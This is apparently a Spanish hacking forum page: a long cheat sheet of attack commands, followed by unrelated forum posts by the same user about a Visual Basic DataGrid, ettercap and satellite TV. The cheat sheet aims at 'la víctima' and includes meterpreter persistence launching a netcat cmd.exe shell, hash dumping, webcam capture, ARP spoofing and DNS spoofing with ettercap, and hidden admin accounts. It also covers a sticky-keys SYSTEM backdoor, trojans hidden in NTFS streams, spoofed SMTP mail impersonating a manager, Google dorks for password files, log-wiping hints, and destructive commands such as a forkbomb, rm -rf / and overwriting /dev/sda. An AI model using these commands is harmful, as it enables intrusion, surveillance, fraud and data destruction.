meterpreter >  reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v Hacked -d 'C:\Windows\System32\nc.exe -L -d -p 1234 -e cmd.exe'  
meterpreter >  reg setval -k HKLM\Software\Microsoft\Windows\CurrentVersion \Run -v CIAUZ -d "C:\WINDOWS\SYSTEM32\nc.exe -L -d -p 1111 -e cmd.exe"
 
Obtener un dump de SAM de la PC víctima.
meterpreter >  hashdump

Obtener la posición.
meterpreter >  getwd

Obtener una foto del escritorio de la víctima.
meterpreter >  screenshot

Obtener lista de webcam disponibles en la pc de la víctima.
meterpreter >  webcam_list

Obtener una imagen de la webcam disponible.
meterpreter >  webcam_snap 1

Habilitar Microsoft Terminal Server. Default Port: 3389.
Con usuario "hax0r" y password "gibs0n"
meterpreter > run getgui -u hax0r -p gibs0n

Activar sniffer en la víctima.
meterpreter > use sniffer
Loading extension sniffer...success.

meterpreter > help

meterpreter > sniffer_interfaces

1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )

meterpreter > sniffer_start 1
  • Capture started on interface 1 (200000 packet buffer)

meterpreter > sniffer_dump 1 all.cap
  • Dumping packets from interface 1...
  • Wrote 19 packets to PCAP file all.cap

meterpreter > sniffer_dump 1 all.cap
  • Dumping packets from interface 1...
  • Wrote 199 packets to PCAP file all.cap
meterpreter > sniffer_stop 1

Nota: Los PCAP serán guardados en C:\Program Files\Rapid7\framework\msf3

*******************************************************************************
*******************************************************************************
Ver el volumen de una unidad.
C:\>vol

*******************************************************************************
*******************************************************************************
Catalogo rápido con CathyCMD.
C:\>Cathycmd -f Cathy.CMD

Catálogo de C
C:\>dir /s >CatalogoC.txt

Catálogo de disco duro con LINUX
$cd /media/sda1
$ls -R > /home/intrude/Catalogo_SDA1.txt

Nota:
En teoría se puede hacer desde comando la pregunta es si algún editor de texto sería capaz
de mostrarnos todas los directorios de un HDD de 1000 GB. Aquí es donde está la importancia
del Cathy.
*******************************************************************************
*******************************************************************************
Instalar telnet en windows vista y windows 7.
C:\>pkgmgr /iu:"TelnetClient"
C:\>pkgmgr /iu:"TelnetServer"

*******************************************************************************
*******************************************************************************
Ocultar un usuario de la pantalla de bienvenida.
Mejor usar registro remoto.
C:\>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v loko /t REG_DWORD /d 00000000

*******************************************************************************
*******************************************************************************
Evitar PING.
$echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all

Aceptar PING.
$echo 0 >/proc/sys/net/ipv4/icmp_echo_ignore_all

*******************************************************************************
*******************************************************************************
Descargar Sitio WEB completo.
$wget -r http://www.lawebquesea.com

Descargar Sitios atendiendo una lista en un TXT.
$wget -r -i listadewebs.txt

*******************************************************************************
*******************************************************************************
Si el usuario tiene password, usa autologin aquí está su usuario y password sin cifrado.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
AltDefaultUserName                               loko
DefaultPassword                                 lokoloko

*******************************************************************************
*******************************************************************************
Determinar proxy que usa la víctima.
HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Internet Setting

ProxyServer 192.168.0.1:8080

*******************************************************************************
*******************************************************************************
Sniffer.
Man in the middle en WIFI.
$ettercap -i wlan0 -TqM ARP:REMOTE /TARGET1IP/ /TARGET2IP/
$ettercap -i wlan0 -T -q -M arp /192.168.1.1/ /192.168.1.56/
$ettercap -T -Q -M arp:remote -i wlan0 /10.10.10.23/ // -P remote_browser
$ettercap -Tq -i wlan0 -M arp:remote /192.168.1.1/ /192.168.1.102/ -w dump
$ettercap -i wlan0 -TqM ARP:REMOTE
$ettercap -Tq -i wlan0 -M arp:remote /192.168.1.101/ /192.168.1.254/
$ettercap -i wlan0 -P remote_browser -T -q -M arp:remote /192.168.0.1/ /192.168.0.14/
$ettercap -T -q -i wlan0 -M ARP:remote /192.168.0.135/ //
$ettercap -T -i wlan0 -M arp:remote /192.168.1.1/ /192.168.1.102/ -P dns_spoof


$tcpdump –Xx –s 500 –n

$tcpdump -n host 192.168.0.2
$tcpdump -n src net 192.168.0
$tcpdump -n net 192.168.0.2
$tcpdump -nXs 0 port 110 or 25 or 20 or 21 or 23

Envenenamiento ARP sslstrip.
$arpspoof -i wlan0? instead of “arpspoof -i wlan0 -t 192.168.1.xx 192.168.1.1
en otra Shell.
$ettercap -T -q -i wlan0 /192.168.1.1/ /192.168.1.56/
*******************************************************************************
*******************************************************************************

Ver el Servicio Netbios que está corriendo y MAC.
C:\>nbtstat -A 192.168.0.11

Mostrar todos los dispositivos de RED y sus IP STATIC.
C:\>nbtstat -s

*******************************************************************************
*******************************************************************************
Comando NET.

Crear un usuario remotamente.
C:\>net user loko loko /add

Pasarlo al grupo de administradores.
C:\>net localgroup administradores loko /add

Cambiar contraseña.
C:\>net user loko  12345

Crear usuario sin contraseña.
C:\>net user loko /add

Ver los recursos compartido (Local).
C:\>net share

Mostrar los recursos compartidos usados.
C:\>net use

Mostrar detalle del recurso conectado.
C:\>net use \\192.168.0.2\g$

Para eliminar recursos compartidos usados.
C:\>net use \\192.168.0.2\g$ /delete

Conectarse a IPC$.
C:\>net use \\192.168.0.2\IPC$ "loko" /user:"loko"
ó
C:\>net use \\192.168.0.2\IPC$ loko /user:loko

Compartir una carpeta.
secretaria = nombre a mostrar de la carpeta compartida.
C:\cartas = ruta a compartir .
C:\>net share secretaria=C:\cartas

Compartir un carpeta con espacio.
C:\>lista="C:\lst fig"

Montar en la unidad z un recurso compartido.
C:\>net use z: \\financiero\cartas
Ejemplo con espacio.
C:\>net use k: "\\financiero 2"\circulares

Desmotar un recurso compartido de la unidad z.
C:\>net use z: /delete

Eliminar la carpeta compartida.
C:\>net share secretaria /delete

Ver lista de equipos en RED.
C:\>net view

Ver sesiones abiertas (Local).
C:\>net session

*******************************************************************************
*******************************************************************************
Ver ficheros abiertos (Local).
C:\>openfiles

Ver conexiones activas TCP.
C:\>netstat -anp TCP

Ver puertos abiertos y muy importante el PID
C:\>netstat -ano

El PID lo podemos ver en el taskmanager solo que hay que decirle que lo muestre.  

Ver todos los privilegios de un usuario.
C:\>whoami

*******************************************************************************
*******************************************************************************
Obtener IP, MAC y SERVICIO.
C:\>arp -a
*******************************************************************************
*******************************************************************************
Ver version de nuestro windows.
Bien
C:\>systeminfo
Win+PAUSE
C:\>winver

*******************************************************************************
*******************************************************************************
Obtener MAC de los dispositivos de red.
C:\>getmac

*******************************************************************************
*******************************************************************************
Configurar permisos archivos y carpetas en modo cmd.
C:\>cacls

*******************************************************************************
*******************************************************************************
Ir a document and settings del usuario iniciado.
%homepath%

Ir a los temporales del usuario iniciado.
%temp%

Ir a la carpeta de instalación Windows.
%windir%
*******************************************************************************
*******************************************************************************
Montar partición en Linux.
$mount -t <file system(ext2,vfat)> <partición (/dev/hda1,/dev/cdrom)> <punto de lecutra"mount point" (/mnt/home/ /mnt/cdrom)

*******************************************************************************
*******************************************************************************
Montar particiones remotas con samba.
$smbmount //IP/C$ /home/juseth -o\user=[usuario],pass=[pass],dom=[dominio]
 
*******************************************************************************
*******************************************************************************
Búsquedas interesantes en Google.
file
-inurl:(htm|html|php)+intitle:"index+of"+"last+modified"+"parent+directory"+description+size+(.mp3|.wma)+"Korn"
-inurl:(htm|html|php)+intitle:"index+of"+"last+modified"+"parent+directory"+description+size+(.doc|.rtf|.pdf)+"Korn"

Password
http://www.google.com/search?q=intitle%3A%22Index+of%22+passwords+modified+site%3AKorn
http://www.google.com/search?hl=en&q=allinurl%3Aauth_user_file.txt+site%3AKorn
http://www.google.com/search?q=inurl%3Apasslist.txt&btnG=Search+site%3AKorn
http://www.google.com/search?q=%22%23+-FrontPage-%22+inurl%3Aservice.pwd+site%3AKorn
http://www.google.com/search?q=intitle%3A%22Index+of%22+config.php+site%3AKorn
http://www.google.com/search?q=%22http%3A%2F%2F*%3A*%40%22Korn

Proxy
http://www.google.com/translate?langpair=en|en&u=Korn
http://www.google.com/gwt/n?u=http%3A%2F%2FKorn

HEX DEC ASCII
%7C 124 |
%3A 58  :
%28 40  (
%29 41  )
%22 34  "
%2B 43  +

"index of/private" + "Parent Directory"
intitle:index.of .bash_history
intitle:index of "Parent Directory" pass site:cu
intitle:index.of .sh_history
filetype:pdf
site.gov.cu

*******************************************************************************
*******************************************************************************
Saltando la protección DisableRegistryTools WindowsXpSp3.
Este es un error súper viejo que al parecer a Windows no le importa :).

Primero quitamos el permiso al registro como lo haría cualquier administrador.
C:\>reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 00000001

Si todo va bien debería salir " El administrador a deshabilitado la modificación del Registro."

Hacemos una copia de c:\Windows\regedit.exe porque es muy importante siempre conservar el original.

Abrimos con OllyDbg nuestra copia de Regedit salvada en C:\Temp\regedit.exe
Click derecho Search For> All referenced strings
Veremos una dirección muy curiosa a la que haremos doble click.
-------------------------------------------------------------------------------
01009A59 Push DisableRegeditTools.01001904 UNICODE "DisableRegistryTools"
-------------------------------------------------------------------------------
Esto nos llevará a la sección del ejecutable donde se encuentra esta referencia.
Nos fijamos en la dirección de comienzo:
-------------------------------------------------------------------------------
01009A4A .v 75 4F JNE SHORT DisableRegeditTools.01009A9B
-------------------------------------------------------------------------------
La sentencia salta corto sino es igual (JNE) a la dirección 01009A9B es justo lo
que necesitamos, solo que como son iguales y no se produce el salto por lo que
caemos en 01009A59 Push DisableRegeditTools.01001904 UNICODE "DisableRegistryTools"
Ok pues entonces modificamos a 01009A4A quedando así:
-------------------------------------------------------------------------------
01009A4A .v 74 4F JE SHORT DisableRegeditTools.01009A9B
-------------------------------------------------------------------------------
Como son iguales entonces se producirá el salto y obviará esta parte :)
Bueno salvemos los cambios.
Click Derecho Edit>Copy to Executable

Resultados:
Ya tenemos un regedit en C:\Temp>regedit.exe que ignora la llave DisableRegistryTools
y nos permite modificar el regedit a nuestro antojo.

*******************************************************************************
*******************************************************************************
Crear usuario bajo la falsificación de programas con privilegios de System en la
pantalla de bienvenida de Windows

Otro error que tampoco parece importarle a WindowsXpSp3
Privilegios de System en la pantalla de bienvenida de sethc.exe y utilman.exe
localizados en:
C:\Windows\System32>

Si se logra hacer una copia de cmd.exe localizado en C:\Windows\System32>
Se debería borrar sethc.exe y renombrar la copia de cmd.exe a sethc.exe
Cuando se borra sethc.exe el sistema tardará poco tiempo en restablecerlo pero
el tiempo que demora es más que suficiente para que nosotros renombremos
nuestra copia de cmd.exe  a sethc.exe.

Si lo hemos hecho bien la presionar seguido 5 veces shift o simplemente
turbeamos el shift nos aparecerá el cmd.exe en vez de sethc.exe.

Nos vamos a la pantalla de bienvenida justo donde sale el control+alt+del
presionamos estas teclas y presionamos 5 veces shift tendremos un cmd.exe
con privilegios de system. Donde podremos crear un usuario con privilegios
de administración.

El procedimiento con utilman es similar solo que se presiona Win+U en vez de 5
veces shift.

Como pueden ver una vez modificados estos ficheros es muy difícil perder la
administración de un sistema al cual tengamos acceso físico.

Por otra parte dudo mucho que usen mucho utilman y sethc :) así que pueden prescindir
de ellos.  

*******************************************************************************
*******************************************************************************
Crear fichero con caracteres no validos mediante notepad.
Si otro error más super viejo que existe aun en Windows7
Normalmente windows no deja crear ficheros con caracteres especiales
Ejemplo:
Hidd$en
Hid:den
Hidde/n

c:\>notepad.exe text.txt

-------------------------------------------------------------------------------
Hello World
-------------------------------------------------------------------------------
Todo bien y si ponemos

c:\>notepad.exe text.txt:Hidden.txt

-------------------------------------------------------------------------------
Esto solo se lee poniendo c:\>notepad.exe text.txt:Hidden.txt mas nada en
windows lo ve porque text.txt:Hidden.txt contiene el caracter especial ":"
En fin notepad a creado un fichero que para windows no es indexable.
A decir verdad nose si se vea desde linux creo que la solución sería formatear
jajajajajaja.
Siempre hay que poner algo .txt y después la barrabasada que se les ocurra.
Alternate Data Stream (ADS) permite hacer cosas muy interesantes basada en esta
técnica y todo se debe que al paracer NTFS no soporta caracteres especiales en su
partición o windows no supo como hacerlo y otros si, averiguen ustedes.
 
Si se borra el fichero text.txt se pierde el acceso a  text.txt:Hidden.txt

Si pornemos directo c:\>notepad.exe ADS.txt:Hidden.txt se crea ADS.txt en blanco y
se borra perdemos lo escrito en ADS.txt:Hidden.txt


Sysinternals elaboró una herramienta llamada streams que nos permite ver ó borrar
ficheros con esta características.
Hacer una busqueda recursiva.
c:\>streams -s c:\

Borrar contenido ADS.
c:\>streams -d c:\

Este fallo solo es en particiones NTFS
-------------------------------------------------------------------------------
 
 Se puede usar esto para cosas como troyanos.
 Moviendo trojan.exe para readme.txt(stream)
 c:\type c:\trojan.exe > c:\readme.txt:trojan.exe
 Ejecutando stream
 c:\start c:\readme.txt:trojan.exe
 extrayendo trojan.exe de readme.txt(stream)
 c:\cat c:\readme.txt:trojan.exe > trojan.exe
 
*******************************************************************************
*******************************************************************************
Tanto EncodeBMP como Blindside nos permiten ocultar cosas dentro de una imagen BMP
EncodeBMP no tiene caso es muy sencillo y tiene ambiente gráfico.
En Blindside se extrae:
c:\Blindside\bside.exe -x decode Imagen.BMP

MP3Stego nos permite esconder cosas en ficheros MP3

Ocultando en MP3.
c:\MP3Stego>encode -E hidden_text.txt -P pass svega.wav svega_stego.mp3

Desocultando en MP3.
c:\MP3Stego>decode -X -P pass svega_stego.mp3

Si se desea documentarse mas la tecnica es conocida como steganography

Herramientas conocidas de para esconder informacion.
makestrm
LADS
LNS
Steganography
FreeSteganography
MP3Stego
snow

*******************************************************************************
*******************************************************************************
Enviar correo anónimo.

C:\>telnet mail.example.com 25
Trying 192.168.1.101...
Connected to mail.example.com.
Escape character is '^]'.
220 mail.example.com ESA3400/SMTP Ready.
C:\>HELO mail.fakehost.com
250 Requested mail action okay, completed.
C:\>MAIL FROM:<attacker@fakehost.com>
250 Requested mail action okay, completed.
C:\>RCPT TO:<nick@example.com>
250 Requested mail action okay, completed.
C:\>DATA
354 Enter mail, end with "." on a line by itself.
C:\>From: Tony Spinelli <tony@example.com>
C:\>To: Nick Nedostup <nick@example.com>
C:\>Subject: Please call me about your review
C:\>Nick,
C:\>It is time for year-end reviews. Please contact me on my new personal
C:\>cellphone number 555-1212, so that we can discuss your performance.
C:\>By the way, if I don't answer, just leave me a voicemail.. I'm in
C:\>meetings all day. Also see if you can add me on Yahoo! Messenger,
C:\>my handle is t0nyspinelli.
C:\>Tony Spinelli
C:\>Example Corp.
C:\>Office: 555-1111
C:\>Mobile: 555-1212 (NEW)
C:\>.
250 Ok: queued as 12345
C:\>QUIT

*******************************************************************************
*******************************************************************************
Escuchar el sonido del disco duro, no es perjudicial.
$sudo cat /dev/sda | aplay -fdat
 
*******************************************************************************
*******************************************************************************
Ejecuta muchos comandos hasta bloquear linux, se le conoce como forkbomb.
$:(){:|:&};:

Borra todo los fichero desde / recursivamente es equivalente a un format Windows
$m -rf /

Sobrescribe el dispositivo /dev/sda provando la perdida de todos los datos
$cualquier_comando > /dev/sda

*******************************************************************************
*******************************************************************************
Borrando huellas
Claves del registro que debemos considerar.
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\AuditBaseObjects
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FullPrivilegeAuditing
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\CrashOnAuditFail

Inicio/Configuración/Barra de tareas y menú Inicio/Opciones avanzadas/Borrar.
%systemroot%\system32\LogFiles

Ojo con los .log y los .evt
Podemos hacer
C:\>dir /s *.log >All_Logs.txt
C:\>dir /s *.evt >All_Event.txt

*******************************************************************************
*******************************************************************************
Excelente lugar para esconder .exe
Windows7
C:\Users\loko\AppData\Local\Microsoft\Windows\Temporary Internet Files>

Windows Xp
C:\Documents and Settings\Usuario\Configuración Local\Archivos temporales de Internet\


Nota:
El motivo es muy sencillo no se ven desde el explorer y aun cuando se borre la cache de
iexplore sigue ahí.
Donde dice Usuario en Windows Xp se debe sustituir por el usuario de la PC Víctima.
 
*******************************************************************************
*******************************************************************************
Hacker actuales reconocidos, buscar redacciones y programas en www.google.com
Gospel
Lympex
Rojodos
HD Moore
Vic_Thor
Andrés Tarascó Acuña
*******************************************************************************
*******************************************************************************
Llenado de disco duro solo a base de carpetas (DOS más usado).
Hacer un cmd o bat con las siguientes líneas.

mkdir.bat
------------------------------------------------------------------------------
:l
mkdir AAA
cd AAA
goto l
------------------------------------------------------------------------------
Ejecutar.
C:\>mkdir.bat

*******************************************************************************
*******************************************************************************
Servicios de Netbios.

Nombre                Sufijo    Tipo    Servicio
------------------------------------------------------------------------------
<nombre_del_ordenador>   00         U       Workstation Service
<nombre_del_ordenador>   01         U       Messenger Service
<\\_MSBROWSE_>           01         G       Master Browser
<nombre_del_ordenador>   03         U       Messenger Service
<nombre_del_ordenador>   06         U       RAS Server Service
<nombre_del_ordenador>   1F         U       NetDDE Service
<nombre_del_ordenador>   20         U       File Server Service
<nombre_del_ordenador>   21         U       RAS Client Service
<nombre_del_ordenador>   22         U       Exchange Interchange
<nombre_del_ordenador>   23         U       Exchange Store
<nombre_del_ordenador>   24         U       Exchange Directory
<nombre_del_ordenador>   30         U       Modem Sharing Server Service
<nombre_del_ordenador>   31         U       Modem Sharing Client Service
<nombre_del_ordenador>   43         U       SMS Client Remote Control
<nombre_del_ordenador>   44         U       SMS Admin Remote Control Tool
<nombre_del_ordenador>   45         U       SMS Client Remote Chat
<nombre_del_ordenador>   46         U       SMS Client Remote Transfer
<nombre_del_ordenador>   4C         U       DEC Pathworks TCPIP Service
<nombre_del_ordenador>   52         U       DEC Pathworks TCPIP Service
<nombre_del_ordenador>   87         U       Exchange MTA
<nombre_del_ordenador>   6A         U       Exchange IMC
<nombre_del_ordenador>   BE         U       Network Monitor Agent
<nombre_del_ordenador>   BF         U       Network Monitor Apps
<nombre_del_usuario>     03         U       Messenger Service
<dominio>                00         G       Domain Name
<dominio>                1B         U       Domain Master Browser
<dominio>                1C         G       Domain Controllers
<dominio>                1D         U       Master Browser
<dominio>                1E         G       Browser Service Elections
<INetServicios>          1C         G       Internet Information Server
<ISnombre_de_ordenador>  00         U       Internet Information Server

*******************************************************************************
*******************************************************************************
Puertos.
Solo es posible de 1 al 65536

Nombre de la función      Puerto   Protocolo/Función
echo                      7             tcp
echo                      7             udp
discard                  9              tcp sink null
discard                     9              udp sink null
systat                      11          tcp
systat                      11         tcp users
daytime                   13         tcp
daytime                   13         udp
netstat                  15         tcp
qotd                      17         tcp quote
qotd                      17         udp quote
chargen                   19         tcp ttytst source
chargen                   19         udp ttytst source
ftp-data                   20         tcp
ftp                      21         tcp
telnet                      23         tcp
smtp                      25         tcp mail
time                      37         tcp timserver
time                      37         udp timserver
rlp                      39          udp resource # resource location
name                      42         tcp nameserver
name                      42         udp nameserver
whois                      43         tcp nicname # usually to sri-nic
domain                       53          tcp nameserver # name-domain server
domain                       53         udp nameserver
nameserver                   53          tcp domain # name-domain server
nameserver                   53         udp domain
mtp                      57         tcp # deprecated
bootp                      67         udp # boot program server
tftp                      69         udp
rje                      77         tcp netrjs
finger                      79         tcp
link                      87           tcp ttylink
supdup                      95         tcp
hostnames                   101          tcp hostn
95  Programación / Programación Visual Basic / Re: DataGrid en: 17 Agosto 2009, 15:33 pm
Ok gracias por responderme pero no creo que puedo hacer mucho con eso y mi nivel basico bajo de programacion si te pudieras explicar mejor seria de ayuda de todas maneras estoy buscando en google todavia como hacerlo.

Gracias a ti y a todos los que han pasado por aqui.

 :¬¬
96  Programación / Programación Visual Basic / DataGrid en: 13 Agosto 2009, 23:13 pm
Hola intento hacer algo parecido al Ias Log Viewer en Visual Basic 6.0 pero nunca he hecho nada con base de datos me pudieran sugerir un codigo para importar IN0708.log a un DataGrid ubicado en un Form de Visual Basic.

Aqui dejo una muestra para cualquier posible sugerencia.
--------------------------------------------------------------------------------------------------
10.8.1.5,elena,08/09/2008,11:45:10,RAS,NEXXUS,4,10.8.1.5,6,2,7,1,5,4,61,0,77,CONNECT 24000,25,311 1 10.8.1.5 08/09/2008 17:12:33 1,44,172,8,10.8.1.11,12,1500,13,1,50,1,51,1,55,1249843510,45,2,40,1,4108,10.8.1.5,4147,311,4148,MSRASV5.20,4160,MSRASV5.10,4120,0x015941484F4F,4294967206,4,4154,Use Windows authentication for all users,4136,4,4142,0
10.8.1.5,elena,08/09/2008,11:46:11,RAS,NEXXUS,4,10.8.1.5,6,2,7,1,5,4,61,0,77,CONNECT 24000,25,311 1 10.8.1.5 08/09/2008 17:12:33 1,44,172,8,10.8.1.11,12,1500,13,1,50,1,51,1,55,1249843569,45,2,46,63,43,9567,42,7006,48,101,47,56,49,1,40,2,4108,10.8.1.5,4147,311,4148,MSRASV5.20,4160,MSRASV5.10,4120,0x015941484F4F,4294967206,4,4154,Use Windows authentication for all users,4136,4,4142,0
10.8.1.5,elena,08/09/2008,12:09:31,RAS,NEXXUS,4,10.8.1.5,6,2,7,1,5,4,61,0,77,CONNECT 24000,25,311 1 10.8.1.5 08/09/2008 17:12:33 2,44,173,8,10.8.1.11,12,1500,13,1,50,3,51,1,55,1249844971,45,2,40,1,4108,10.8.1.5,4147,311,4148,MSRASV5.20,4160,MSRASV5.10,4120,0x005941484F4F,4294967206,4,4154,Use Windows authentication for all users,4136,4,4142,0
10.8.1.5,elena,08/09/2008,12:10:10,RAS,NEXXUS,4,10.8.1.5,6,2,7,1,5,4,61,0,77,CONNECT 24000,25,311 1 10.8.1.5 08/09/2008 17:12:33 2,44,173,8,10.8.1.11,12,1500,13,1,50,3,51,1,55,1249845008,45,2,46,42,43,2893,42,7109,48,55,47,59,49,1,40,2,4108,10.8.1.5,4147,311,4148,MSRASV5.20,4160,MSRASV5.10,4120,0x005941484F4F,4294967206,4,4154,Use Windows authentication for all users,4136,4,4142,0
--------------------------------------------------------------------------------------------------

Gracias por adelantado


AngelFire
97  Seguridad Informática / Hacking / Re: Manual de Ettercap NG 0.7 en: 26 Septiembre 2006, 15:49 pm
AngelFire, no abuses de antraXactive, el ya ha hecho el tutorial de ettercap, si tu quieres hacerlo en windows, intenta hace rlos pasos, ya que seguramente seran parecidos, y si te atascas en aglun sitio en concreto pregunta y te responderemos, pero no pidas que hagamos otro tutorial para windows.

Ademas a mi eso me huele a lamerada, seguramente solo querras hacerlo para robar alguna cuenta.

PD: Si no lo haces con intencions lammers te pido disculpas  ;)

El abuso requiere de violencia, no mencione nick en especifico,entiendo que rechases windows aunque se que una vez pasate por el.Si bajaras la distro de ettercap para win32 te darias cuenta que no es tan parecido y sumale a eso que no todos saben.
En cuanto a lo de lammer solo me rio ya que aqui la mayoria son usuarios de programas creados por verdaderos genios, yo soy solo un user mas ;y no pidas disculpas eso solo te hace mas debil.

Bye


AngelFire

98  Seguridad Informática / Hacking / Re: Manual de Ettercap NG 0.7 en: 25 Septiembre 2006, 20:27 pm
Seria muy dificil que explicaran eso mismo pero desde la distribicion del ettercap que sacaron para windows

bye

AngelFire
99  Foros Generales / Sugerencias y dudas sobre el Foro / DVB-S en: 8 Junio 2006, 20:59 pm
Hola soy nuevo en este sitio y no se si en el foro hay un espacio dedicado a la televesion digital por satelite pues me interesa todo los relacionado con este.De no haber ninguno en este sitio alguien conoce alguno link que me puedan recomendar.



                                                bye


                                         AngelFire
Páginas: 1 2 3 4 5 6 7 8 9 [10]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines